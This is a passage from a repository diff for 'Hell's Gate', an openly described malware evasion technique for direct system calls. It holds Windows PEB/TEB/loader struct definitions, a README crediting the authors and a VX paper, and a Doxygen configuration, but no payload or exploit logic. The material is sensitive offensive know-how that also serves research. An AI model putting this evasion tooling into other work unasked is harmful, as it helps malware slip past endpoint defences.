STRUCTURES
|
||||||
|
--------------------------------------------------------------------*/
|
||||||
|
typedef struct _LSA_UNICODE_STRING {
|
||||||
|
USHORT Length;
|
||||||
|
USHORT MaximumLength;
|
||||||
|
PWSTR Buffer;
|
||||||
|
} LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
|
||||||
|
|
||||||
|
typedef struct _LDR_MODULE {
|
||||||
|
LIST_ENTRY InLoadOrderModuleList;
|
||||||
|
LIST_ENTRY InMemoryOrderModuleList;
|
||||||
|
LIST_ENTRY InInitializationOrderModuleList;
|
||||||
|
PVOID BaseAddress;
|
||||||
|
PVOID EntryPoint;
|
||||||
|
ULONG SizeOfImage;
|
||||||
|
UNICODE_STRING FullDllName;
|
||||||
|
UNICODE_STRING BaseDllName;
|
||||||
|
ULONG Flags;
|
||||||
|
SHORT LoadCount;
|
||||||
|
SHORT TlsIndex;
|
||||||
|
LIST_ENTRY HashTableEntry;
|
||||||
|
ULONG TimeDateStamp;
|
||||||
|
} LDR_MODULE, * PLDR_MODULE;
|
||||||
|
|
||||||
|
typedef struct _PEB_LDR_DATA {
|
||||||
|
ULONG Length;
|
||||||
|
ULONG Initialized;
|
||||||
|
PVOID SsHandle;
|
||||||
|
LIST_ENTRY InLoadOrderModuleList;
|
||||||
|
LIST_ENTRY InMemoryOrderModuleList;
|
||||||
|
LIST_ENTRY InInitializationOrderModuleList;
|
||||||
|
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
||||||
|
|
||||||
|
typedef struct _PEB {
|
||||||
|
BOOLEAN InheritedAddressSpace;
|
||||||
|
BOOLEAN ReadImageFileExecOptions;
|
||||||
|
BOOLEAN BeingDebugged;
|
||||||
|
BOOLEAN Spare;
|
||||||
|
HANDLE Mutant;
|
||||||
|
PVOID ImageBase;
|
||||||
|
PPEB_LDR_DATA LoaderData;
|
||||||
|
PVOID ProcessParameters;
|
||||||
|
PVOID SubSystemData;
|
||||||
|
PVOID ProcessHeap;
|
||||||
|
PVOID FastPebLock;
|
||||||
|
PVOID FastPebLockRoutine;
|
||||||
|
PVOID FastPebUnlockRoutine;
|
||||||
|
ULONG EnvironmentUpdateCount;
|
||||||
|
PVOID* KernelCallbackTable;
|
||||||
|
PVOID EventLogSection;
|
||||||
|
PVOID EventLog;
|
||||||
|
PVOID FreeList;
|
||||||
|
ULONG TlsExpansionCounter;
|
||||||
|
PVOID TlsBitmap;
|
||||||
|
ULONG TlsBitmapBits[0x2];
|
||||||
|
PVOID ReadOnlySharedMemoryBase;
|
||||||
|
PVOID ReadOnlySharedMemoryHeap;
|
||||||
|
PVOID* ReadOnlyStaticServerData;
|
||||||
|
PVOID AnsiCodePageData;
|
||||||
|
PVOID OemCodePageData;
|
||||||
|
PVOID UnicodeCaseTableData;
|
||||||
|
ULONG NumberOfProcessors;
|
||||||
|
ULONG NtGlobalFlag;
|
||||||
|
BYTE Spare2[0x4];
|
||||||
|
LARGE_INTEGER CriticalSectionTimeout;
|
||||||
|
ULONG HeapSegmentReserve;
|
||||||
|
ULONG HeapSegmentCommit;
|
||||||
|
ULONG HeapDeCommitTotalFreeThreshold;
|
||||||
|
ULONG HeapDeCommitFreeBlockThreshold;
|
||||||
|
ULONG NumberOfHeaps;
|
||||||
|
ULONG MaximumNumberOfHeaps;
|
||||||
|
PVOID** ProcessHeaps;
|
||||||
|
PVOID GdiSharedHandleTable;
|
||||||
|
PVOID ProcessStarterHelper;
|
||||||
|
PVOID GdiDCAttributeList;
|
||||||
|
PVOID LoaderLock;
|
||||||
|
ULONG OSMajorVersion;
|
||||||
|
ULONG OSMinorVersion;
|
||||||
|
ULONG OSBuildNumber;
|
||||||
|
ULONG OSPlatformId;
|
||||||
|
ULONG ImageSubSystem;
|
||||||
|
ULONG ImageSubSystemMajorVersion;
|
||||||
|
ULONG ImageSubSystemMinorVersion;
|
||||||
|
ULONG GdiHandleBuffer[0x22];
|
||||||
|
ULONG PostProcessInitRoutine;
|
||||||
|
ULONG TlsExpansionBitmap;
|
||||||
|
BYTE TlsExpansionBitmapBits[0x80];
|
||||||
|
ULONG SessionId;
|
||||||
|
} PEB, * PPEB;
|
||||||
|
|
||||||
|
typedef struct __CLIENT_ID {
|
||||||
|
HANDLE UniqueProcess;
|
||||||
|
HANDLE UniqueThread;
|
||||||
|
} CLIENT_ID, * PCLIENT_ID;
|
||||||
|
|
||||||
|
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
|
||||||
|
ULONG Flags;
|
||||||
|
PCHAR FrameName;
|
||||||
|
} TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
|
||||||
|
|
||||||
|
typedef struct _TEB_ACTIVE_FRAME {
|
||||||
|
ULONG Flags;
|
||||||
|
struct _TEB_ACTIVE_FRAME* Previous;
|
||||||
|
PTEB_ACTIVE_FRAME_CONTEXT Context;
|
||||||
|
} TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
|
||||||
|
|
||||||
|
typedef struct _GDI_TEB_BATCH {
|
||||||
|
ULONG Offset;
|
||||||
|
ULONG HDC;
|
||||||
|
ULONG Buffer[310];
|
||||||
|
} GDI_TEB_BATCH, * PGDI_TEB_BATCH;
|
||||||
|
|
||||||
|
typedef PVOID PACTIVATION_CONTEXT;
|
||||||
|
|
||||||
|
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
|
||||||
|
struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
|
||||||
|
PACTIVATION_CONTEXT ActivationContext;
|
||||||
|
ULONG Flags;
|
||||||
|
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
|
||||||
|
|
||||||
|
typedef struct _ACTIVATION_CONTEXT_STACK {
|
||||||
|
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
|
||||||
|
LIST_ENTRY FrameListCache;
|
||||||
|
ULONG Flags;
|
||||||
|
ULONG NextCookieSequenceNumber;
|
||||||
|
ULONG StackId;
|
||||||
|
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
|
||||||
|
|
||||||
|
typedef struct _TEB {
|
||||||
|
NT_TIB NtTib;
|
||||||
|
PVOID EnvironmentPointer;
|
||||||
|
CLIENT_ID ClientId;
|
||||||
|
PVOID ActiveRpcHandle;
|
||||||
|
PVOID ThreadLocalStoragePointer;
|
||||||
|
PPEB ProcessEnvironmentBlock;
|
||||||
|
ULONG LastErrorValue;
|
||||||
|
ULONG CountOfOwnedCriticalSections;
|
||||||
|
PVOID CsrClientThread;
|
||||||
|
PVOID Win32ThreadInfo;
|
||||||
|
ULONG User32Reserved[26];
|
||||||
|
ULONG UserReserved[5];
|
||||||
|
PVOID WOW32Reserved;
|
||||||
|
LCID CurrentLocale;
|
||||||
|
ULONG FpSoftwareStatusRegister;
|
||||||
|
PVOID SystemReserved1[54];
|
||||||
|
LONG ExceptionCode;
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||||
|
PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
|
||||||
|
UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
|
||||||
|
ULONG TxFsContext;
|
||||||
|
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
|
||||||
|
UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
|
||||||
|
#else
|
||||||
|
ACTIVATION_CONTEXT_STACK ActivationContextStack;
|
||||||
|
UCHAR SpareBytes1[24];
|
||||||
|
#endif
|
||||||
|
GDI_TEB_BATCH GdiTebBatch;
|
||||||
|
CLIENT_ID RealClientId;
|
||||||
|
PVOID GdiCachedProcessHandle;
|
||||||
|
ULONG GdiClientPID;
|
||||||
|
ULONG GdiClientTID;
|
||||||
|
PVOID GdiThreadLocalInfo;
|
||||||
|
PSIZE_T Win32ClientInfo[62];
|
||||||
|
PVOID glDispatchTable[233];
|
||||||
|
PSIZE_T glReserved1[29];
|
||||||
|
PVOID glReserved2;
|
||||||
|
PVOID glSectionInfo;
|
||||||
|
PVOID glSection;
|
||||||
|
PVOID glTable;
|
||||||
|
PVOID glCurrentRC;
|
||||||
|
PVOID glContext;
|
||||||
|
NTSTATUS LastStatusValue;
|
||||||
|
UNICODE_STRING StaticUnicodeString;
|
||||||
|
WCHAR StaticUnicodeBuffer[261];
|
||||||
|
PVOID DeallocationStack;
|
||||||
|
PVOID TlsSlots[64];
|
||||||
|
LIST_ENTRY TlsLinks;
|
||||||
|
PVOID Vdm;
|
||||||
|
PVOID ReservedForNtRpc;
|
||||||
|
PVOID DbgSsReserved[2];
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
ULONG HardErrorMode;
|
||||||
|
#else
|
||||||
|
ULONG HardErrorsAreDisabled;
|
||||||
|
#endif
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||||
|
PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
|
||||||
|
GUID ActivityId;
|
||||||
|
PVOID SubProcessTag;
|
||||||
|
PVOID EtwLocalData;
|
||||||
|
PVOID EtwTraceData;
|
||||||
|
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
PVOID Instrumentation[14];
|
||||||
|
PVOID SubProcessTag;
|
||||||
|
PVOID EtwLocalData;
|
||||||
|
#else
|
||||||
|
PVOID Instrumentation[16];
|
||||||
|
#endif
|
||||||
|
PVOID WinSockData;
|
||||||
|
ULONG GdiBatchCount;
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||||
|
BOOLEAN SpareBool0;
|
||||||
|
BOOLEAN SpareBool1;
|
||||||
|
BOOLEAN SpareBool2;
|
||||||
|
#else
|
||||||
|
BOOLEAN InDbgPrint;
|
||||||
|
BOOLEAN FreeStackOnTermination;
|
||||||
|
BOOLEAN HasFiberData;
|
||||||
|
#endif
|
||||||
|
UCHAR IdealProcessor;
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
ULONG GuaranteedStackBytes;
|
||||||
|
#else
|
||||||
|
ULONG Spare3;
|
||||||
|
#endif
|
||||||
|
PVOID ReservedForPerf;
|
||||||
|
PVOID ReservedForOle;
|
||||||
|
ULONG WaitingOnLoaderLock;
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||||
|
PVOID SavedPriorityState;
|
||||||
|
ULONG_PTR SoftPatchPtr1;
|
||||||
|
ULONG_PTR ThreadPoolData;
|
||||||
|
#elif (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
ULONG_PTR SparePointer1;
|
||||||
|
ULONG_PTR SoftPatchPtr1;
|
||||||
|
ULONG_PTR SoftPatchPtr2;
|
||||||
|
#else
|
||||||
|
Wx86ThreadState Wx86Thread;
|
||||||
|
#endif
|
||||||
|
PVOID* TlsExpansionSlots;
|
||||||
|
#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
|
||||||
|
PVOID DeallocationBStore;
|
||||||
|
PVOID BStoreLimit;
|
||||||
|
#endif
|
||||||
|
ULONG ImpersonationLocale;
|
||||||
|
ULONG IsImpersonating;
|
||||||
|
PVOID NlsCache;
|
||||||
|
PVOID pShimData;
|
||||||
|
ULONG HeapVirtualAffinity;
|
||||||
|
HANDLE CurrentTransactionHandle;
|
||||||
|
PTEB_ACTIVE_FRAME ActiveFrame;
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_WS03)
|
||||||
|
PVOID FlsData;
|
||||||
|
#endif
|
||||||
|
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
|
||||||
|
PVOID PreferredLangauges;
|
||||||
|
PVOID UserPrefLanguages;
|
||||||
|
PVOID MergedPrefLanguages;
|
||||||
|
ULONG MuiImpersonation;
|
||||||
|
union
|
||||||
|
{
|
||||||
|
struct
|
||||||
|
{
|
||||||
|
USHORT SpareCrossTebFlags : 16;
|
||||||
|
};
|
||||||
|
USHORT CrossTebFlags;
|
||||||
|
};
|
||||||
|
union
|
||||||
|
{
|
||||||
|
struct
|
||||||
|
{
|
||||||
|
USHORT DbgSafeThunkCall : 1;
|
||||||
|
USHORT DbgInDebugPrint : 1;
|
||||||
|
USHORT DbgHasFiberData : 1;
|
||||||
|
USHORT DbgSkipThreadAttach : 1;
|
||||||
|
USHORT DbgWerInShipAssertCode : 1;
|
||||||
|
USHORT DbgIssuedInitialBp : 1;
|
||||||
|
USHORT DbgClonedThread : 1;
|
||||||
|
USHORT SpareSameTebBits : 9;
|
||||||
|
};
|
||||||
|
USHORT SameTebFlags;
|
||||||
|
};
|
||||||
|
PVOID TxnScopeEntercallback;
|
||||||
|
PVOID TxnScopeExitCAllback;
|
||||||
|
PVOID TxnScopeContext;
|
||||||
|
ULONG LockCount;
|
||||||
|
ULONG ProcessRundown;
|
||||||
|
ULONG64 LastSwitchTime;
|
||||||
|
ULONG64 TotalSwitchOutTime;
|
||||||
|
LARGE_INTEGER WaitReasonBitMap;
|
||||||
|
#else
|
||||||
|
BOOLEAN SafeThunkCall;
|
||||||
|
BOOLEAN BooleanSpare[3];
|
||||||
|
#endif
|
||||||
|
} TEB, * PTEB;
|
||||||
|
|
||||||
|
typedef struct _LDR_DATA_TABLE_ENTRY {
|
||||||
|
LIST_ENTRY InLoadOrderLinks;
|
||||||
|
LIST_ENTRY InMemoryOrderLinks;
|
||||||
|
LIST_ENTRY InInitializationOrderLinks;
|
||||||
|
PVOID DllBase;
|
||||||
|
PVOID EntryPoint;
|
||||||
|
ULONG SizeOfImage;
|
||||||
|
UNICODE_STRING FullDllName;
|
||||||
|
UNICODE_STRING BaseDllName;
|
||||||
|
ULONG Flags;
|
||||||
|
WORD LoadCount;
|
||||||
|
WORD TlsIndex;
|
||||||
|
union {
|
||||||
|
LIST_ENTRY HashLinks;
|
||||||
|
struct {
|
||||||
|
PVOID SectionPointer;
|
||||||
|
ULONG CheckSum;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
union {
|
||||||
|
ULONG TimeDateStamp;
|
||||||
|
PVOID LoadedImports;
|
||||||
|
};
|
||||||
|
PACTIVATION_CONTEXT EntryPointActivationContext;
|
||||||
|
PVOID PatchInformation;
|
||||||
|
LIST_ENTRY ForwarderLinks;
|
||||||
|
LIST_ENTRY ServiceTagLinks;
|
||||||
|
LIST_ENTRY StaticLinks;
|
||||||
|
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
|
||||||
|
|
||||||
|
typedef struct _OBJECT_ATTRIBUTES {
|
||||||
|
ULONG Length;
|
||||||
|
PVOID RootDirectory;
|
||||||
|
PUNICODE_STRING ObjectName;
|
||||||
|
ULONG Attributes;
|
||||||
|
PVOID SecurityDescriptor;
|
||||||
|
PVOID SecurityQualityOfService;
|
||||||
|
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
|
||||||
|
|
||||||
|
typedef struct _INITIAL_TEB {
|
||||||
|
PVOID StackBase;
|
||||||
|
PVOID StackLimit;
|
||||||
|
PVOID StackCommit;
|
||||||
|
PVOID StackCommitMax;
|
||||||
|
PVOID StackReserved;
|
||||||
|
} INITIAL_TEB, * PINITIAL_TEB;
|
21
Hells Gate/C Implementation/README.md
Normal file
21
Hells Gate/C Implementation/README.md
Normal file
@ -0,0 +1,21 @@
|
|||||||
|
## Hell's Gate ##
|
||||||
|
|
||||||
|
Original C Implementation of the Hell's Gate VX Technique
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
|
||||||
|
<br /> PDF also included in this repository.
|
||||||
|
<br />
|
||||||
|
<br />
|
||||||
|
Authors:
|
||||||
|
* Paul Laîné (@am0nsec)
|
||||||
|
* smelly__vx (@RtlMateusz)
|
||||||
|
<br />
|
||||||
|
|
||||||
|
### Update ###
|
||||||
|
Please note:
|
||||||
|
* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
|
||||||
|
* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
|
||||||
|
* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
|
||||||
|
* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
|
||||||
|
|
385
Hells Gate/C# Implementation/Doxyfile
Normal file
385
Hells Gate/C# Implementation/Doxyfile
Normal file
@ -0,0 +1,385 @@
|
|||||||
|
# Doxyfile 1.8.18
|
||||||
|
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Project related configuration options
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
DOXYFILE_ENCODING = UTF-8
|
||||||
|
PROJECT_NAME = "Shap Hell's Gate"
|
||||||
|
PROJECT_NUMBER = 1.0
|
||||||
|
PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
|
||||||
|
PROJECT_LOGO =
|
||||||
|
OUTPUT_DIRECTORY = ./doc/
|
||||||
|
CREATE_SUBDIRS = YES
|
||||||
|
ALLOW_UNICODE_NAMES = NO
|
||||||
|
OUTPUT_LANGUAGE = English
|
||||||
|
OUTPUT_TEXT_DIRECTION = None
|
||||||
|
BRIEF_MEMBER_DESC = YES
|
||||||
|
REPEAT_BRIEF = YES
|
||||||
|
ABBREVIATE_BRIEF = "The $name class" \
|
||||||
|
"The $name widget" \
|
||||||
|
"The $name file" \
|
||||||
|
is \
|
||||||
|
provides \
|
||||||
|
specifies \
|
||||||
|
contains \
|
||||||
|
represents \
|
||||||
|
a \
|
||||||
|
an \
|
||||||
|
the
|
||||||
|
ALWAYS_DETAILED_SEC = NO
|
||||||
|
INLINE_INHERITED_MEMB = NO
|
||||||
|
FULL_PATH_NAMES = YES
|
||||||
|
STRIP_FROM_PATH =
|
||||||
|
STRIP_FROM_INC_PATH =
|
||||||
|
SHORT_NAMES = NO
|
||||||
|
JAVADOC_AUTOBRIEF = NO
|
||||||
|
JAVADOC_BANNER = NO
|
||||||
|
QT_AUTOBRIEF = NO
|
||||||
|
MULTILINE_CPP_IS_BRIEF = NO
|
||||||
|
INHERIT_DOCS = YES
|
||||||
|
SEPARATE_MEMBER_PAGES = NO
|
||||||
|
TAB_SIZE = 4
|
||||||
|
ALIASES =
|
||||||
|
OPTIMIZE_OUTPUT_FOR_C = NO
|
||||||
|
OPTIMIZE_OUTPUT_JAVA = NO
|
||||||
|
OPTIMIZE_FOR_FORTRAN = NO
|
||||||
|
OPTIMIZE_OUTPUT_VHDL = NO
|
||||||
|
OPTIMIZE_OUTPUT_SLICE = NO
|
||||||
|
EXTENSION_MAPPING =
|
||||||
|
MARKDOWN_SUPPORT = YES
|
||||||
|
TOC_INCLUDE_HEADINGS = 5
|
||||||
|
AUTOLINK_SUPPORT = YES
|
||||||
|
BUILTIN_STL_SUPPORT = NO
|
||||||
|
CPP_CLI_SUPPORT = NO
|
||||||
|
SIP_SUPPORT = NO
|
||||||
|
IDL_PROPERTY_SUPPORT = YES
|
||||||
|
DISTRIBUTE_GROUP_DOC = NO
|
||||||
|
GROUP_NESTED_COMPOUNDS = NO
|
||||||
|
SUBGROUPING = YES
|
||||||
|
INLINE_GROUPED_CLASSES = NO
|
||||||
|
INLINE_SIMPLE_STRUCTS = NO
|
||||||
|
TYPEDEF_HIDES_STRUCT = NO
|
||||||
|
LOOKUP_CACHE_SIZE = 0
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Build related configuration options
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
EXTRACT_ALL = YES
|
||||||
|
EXTRACT_PRIVATE = YES
|
||||||
|
EXTRACT_PRIV_VIRTUAL = YES
|
||||||
|
EXTRACT_PACKAGE = YES
|
||||||
|
EXTRACT_STATIC = YES
|
||||||
|
EXTRACT_LOCAL_CLASSES = YES
|
||||||
|
EXTRACT_LOCAL_METHODS = NO
|
||||||
|
EXTRACT_ANON_NSPACES = YES
|
||||||
|
HIDE_UNDOC_MEMBERS = NO
|
||||||
|
HIDE_UNDOC_CLASSES = NO
|
||||||
|
HIDE_FRIEND_COMPOUNDS = NO
|
||||||
|
HIDE_IN_BODY_DOCS = NO
|
||||||
|
INTERNAL_DOCS = NO
|
||||||
|
CASE_SENSE_NAMES = YES
|
||||||
|
HIDE_SCOPE_NAMES = NO
|
||||||
|
HIDE_COMPOUND_REFERENCE= NO
|
||||||
|
SHOW_INCLUDE_FILES = YES
|
||||||
|
SHOW_GROUPED_MEMB_INC = NO
|
||||||
|
FORCE_LOCAL_INCLUDES = NO
|
||||||
|
INLINE_INFO = YES
|
||||||
|
SORT_MEMBER_DOCS = YES
|
||||||
|
SORT_BRIEF_DOCS = NO
|
||||||
|
SORT_MEMBERS_CTORS_1ST = NO
|
||||||
|
SORT_GROUP_NAMES = NO
|
||||||
|
SORT_BY_SCOPE_NAME = NO
|
||||||
|
STRICT_PROTO_MATCHING = NO
|
||||||
|
GENERATE_TODOLIST = YES
|
||||||
|
GENERATE_TESTLIST = YES
|
||||||
|
GENERATE_BUGLIST = YES
|
||||||
|
GENERATE_DEPRECATEDLIST= YES
|
||||||
|
ENABLED_SECTIONS =
|
||||||
|
MAX_INITIALIZER_LINES = 30
|
||||||
|
SHOW_USED_FILES = YES
|
||||||
|
SHOW_FILES = YES
|
||||||
|
SHOW_NAMESPACES = YES
|
||||||
|
FILE_VERSION_FILTER =
|
||||||
|
LAYOUT_FILE =
|
||||||
|
CITE_BIB_FILES =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to warning and progress messages
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
QUIET = NO
|
||||||
|
WARNINGS = YES
|
||||||
|
WARN_IF_UNDOCUMENTED = YES
|
||||||
|
WARN_IF_DOC_ERROR = YES
|
||||||
|
WARN_NO_PARAMDOC = NO
|
||||||
|
WARN_AS_ERROR = NO
|
||||||
|
WARN_FORMAT = "$file:$line: $text"
|
||||||
|
WARN_LOGFILE =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the input files
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
INPUT = .
|
||||||
|
INPUT_ENCODING = UTF-8
|
||||||
|
FILE_PATTERNS = *.c \
|
||||||
|
*.cc \
|
||||||
|
*.cxx \
|
||||||
|
*.cpp \
|
||||||
|
*.c++ \
|
||||||
|
*.java \
|
||||||
|
*.ii \
|
||||||
|
*.ixx \
|
||||||
|
*.ipp \
|
||||||
|
*.i++ \
|
||||||
|
*.inl \
|
||||||
|
*.idl \
|
||||||
|
*.ddl \
|
||||||
|
*.odl \
|
||||||
|
*.h \
|
||||||
|
*.hh \
|
||||||
|
*.hxx \
|
||||||
|
*.hpp \
|
||||||
|
*.h++ \
|
||||||
|
*.cs \
|
||||||
|
*.d \
|
||||||
|
*.php \
|
||||||
|
*.php4 \
|
||||||
|
*.php5 \
|
||||||
|
*.phtml \
|
||||||
|
*.inc \
|
||||||
|
*.m \
|
||||||
|
*.markdown \
|
||||||
|
*.md \
|
||||||
|
*.mm \
|
||||||
|
*.dox \
|
||||||
|
*.doc \
|
||||||
|
*.txt \
|
||||||
|
*.py \
|
||||||
|
*.pyw \
|
||||||
|
*.f90 \
|
||||||
|
*.f95 \
|
||||||
|
*.f03 \
|
||||||
|
*.f08 \
|
||||||
|
*.f18 \
|
||||||
|
*.f \
|
||||||
|
*.for \
|
||||||
|
*.vhd \
|
||||||
|
*.vhdl \
|
||||||
|
*.ucf \
|
||||||
|
*.qsf \
|
||||||
|
*.ice
|
||||||
|
RECURSIVE = YES
|
||||||
|
EXCLUDE =
|
||||||
|
EXCLUDE_SYMLINKS = NO
|
||||||
|
EXCLUDE_PATTERNS =
|
||||||
|
EXCLUDE_SYMBOLS =
|
||||||
|
EXAMPLE_PATH =
|
||||||
|
EXAMPLE_PATTERNS = *
|
||||||
|
EXAMPLE_RECURSIVE = NO
|
||||||
|
IMAGE_PATH =
|
||||||
|
INPUT_FILTER =
|
||||||
|
FILTER_PATTERNS =
|
||||||
|
FILTER_SOURCE_FILES = NO
|
||||||
|
FILTER_SOURCE_PATTERNS =
|
||||||
|
USE_MDFILE_AS_MAINPAGE =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to source browsing
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
SOURCE_BROWSER = YES
|
||||||
|
INLINE_SOURCES = YES
|
||||||
|
STRIP_CODE_COMMENTS = YES
|
||||||
|
REFERENCED_BY_RELATION = YES
|
||||||
|
REFERENCES_RELATION = NO
|
||||||
|
REFERENCES_LINK_SOURCE = YES
|
||||||
|
SOURCE_TOOLTIPS = YES
|
||||||
|
USE_HTAGS = NO
|
||||||
|
VERBATIM_HEADERS = YES
|
||||||
|
CLANG_ASSISTED_PARSING = NO
|
||||||
|
CLANG_OPTIONS =
|
||||||
|
CLANG_DATABASE_PATH =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the alphabetical class index
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
ALPHABETICAL_INDEX = YES
|
||||||
|
COLS_IN_ALPHA_INDEX = 5
|
||||||
|
IGNORE_PREFIX =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the HTML output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_HTML = YES
|
||||||
|
HTML_OUTPUT = html
|
||||||
|
HTML_FILE_EXTENSION = .html
|
||||||
|
HTML_HEADER =
|
||||||
|
HTML_FOOTER =
|
||||||
|
HTML_STYLESHEET =
|
||||||
|
HTML_EXTRA_STYLESHEET =
|
||||||
|
HTML_EXTRA_FILES =
|
||||||
|
HTML_COLORSTYLE_HUE = 220
|
||||||
|
HTML_COLORSTYLE_SAT = 100
|
||||||
|
HTML_COLORSTYLE_GAMMA = 80
|
||||||
|
HTML_TIMESTAMP = YES
|
||||||
|
HTML_DYNAMIC_MENUS = YES
|
||||||
|
HTML_DYNAMIC_SECTIONS = NO
|
||||||
|
HTML_INDEX_NUM_ENTRIES = 100
|
||||||
|
GENERATE_DOCSET = NO
|
||||||
|
DOCSET_FEEDNAME = "Doxygen generated docs"
|
||||||
|
DOCSET_BUNDLE_ID = org.doxygen.Project
|
||||||
|
DOCSET_PUBLISHER_ID = org.doxygen.Publisher
|
||||||
|
DOCSET_PUBLISHER_NAME = Publisher
|
||||||
|
GENERATE_HTMLHELP = NO
|
||||||
|
CHM_FILE =
|
||||||
|
HHC_LOCATION =
|
||||||
|
GENERATE_CHI = NO
|
||||||
|
CHM_INDEX_ENCODING =
|
||||||
|
BINARY_TOC = NO
|
||||||
|
TOC_EXPAND = NO
|
||||||
|
GENERATE_QHP = NO
|
||||||
|
QCH_FILE =
|
||||||
|
QHP_NAMESPACE = org.doxygen.Project
|
||||||
|
QHP_VIRTUAL_FOLDER = doc
|
||||||
|
QHP_CUST_FILTER_NAME =
|
||||||
|
QHP_CUST_FILTER_ATTRS =
|
||||||
|
QHP_SECT_FILTER_ATTRS =
|
||||||
|
QHG_LOCATION =
|
||||||
|
GENERATE_ECLIPSEHELP = NO
|
||||||
|
ECLIPSE_DOC_ID = org.doxygen.Project
|
||||||
|
DISABLE_INDEX = NO
|
||||||
|
GENERATE_TREEVIEW = YES
|
||||||
|
ENUM_VALUES_PER_LINE = 4
|
||||||
|
TREEVIEW_WIDTH = 250
|
||||||
|
EXT_LINKS_IN_WINDOW = NO
|
||||||
|
HTML_FORMULA_FORMAT = png
|
||||||
|
FORMULA_FONTSIZE = 10
|
||||||
|
FORMULA_TRANSPARENT = YES
|
||||||
|
FORMULA_MACROFILE =
|
||||||
|
USE_MATHJAX = NO
|
||||||
|
MATHJAX_FORMAT = HTML-CSS
|
||||||
|
MATHJAX_RELPATH = https://cdn.jsdelivr.net/npm/mathjax@2
|
||||||
|
MATHJAX_EXTENSIONS =
|
||||||
|
MATHJAX_CODEFILE =
|
||||||
|
SEARCHENGINE = YES
|
||||||
|
SERVER_BASED_SEARCH = NO
|
||||||
|
EXTERNAL_SEARCH = NO
|
||||||
|
SEARCHENGINE_URL =
|
||||||
|
SEARCHDATA_FILE = searchdata.xml
|
||||||
|
EXTERNAL_SEARCH_ID =
|
||||||
|
EXTRA_SEARCH_MAPPINGS =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the LaTeX output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_LATEX = NO
|
||||||
|
LATEX_OUTPUT = latex
|
||||||
|
LATEX_CMD_NAME =
|
||||||
|
MAKEINDEX_CMD_NAME = makeindex
|
||||||
|
LATEX_MAKEINDEX_CMD = makeindex
|
||||||
|
COMPACT_LATEX = NO
|
||||||
|
PAPER_TYPE = a4
|
||||||
|
EXTRA_PACKAGES =
|
||||||
|
LATEX_HEADER =
|
||||||
|
LATEX_FOOTER =
|
||||||
|
LATEX_EXTRA_STYLESHEET =
|
||||||
|
LATEX_EXTRA_FILES =
|
||||||
|
PDF_HYPERLINKS = YES
|
||||||
|
USE_PDFLATEX = YES
|
||||||
|
LATEX_BATCHMODE = NO
|
||||||
|
LATEX_HIDE_INDICES = NO
|
||||||
|
LATEX_SOURCE_CODE = NO
|
||||||
|
LATEX_BIB_STYLE = plain
|
||||||
|
LATEX_TIMESTAMP = NO
|
||||||
|
LATEX_EMOJI_DIRECTORY =
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
# Configuration options related to the RTF output
|
||||||
|
#---------------------------------------------------------------------------
|
||||||
|
GENERATE_RTF = NO
|
||||||
|
RTF_OUTPUT = rtf
|
||||||
|
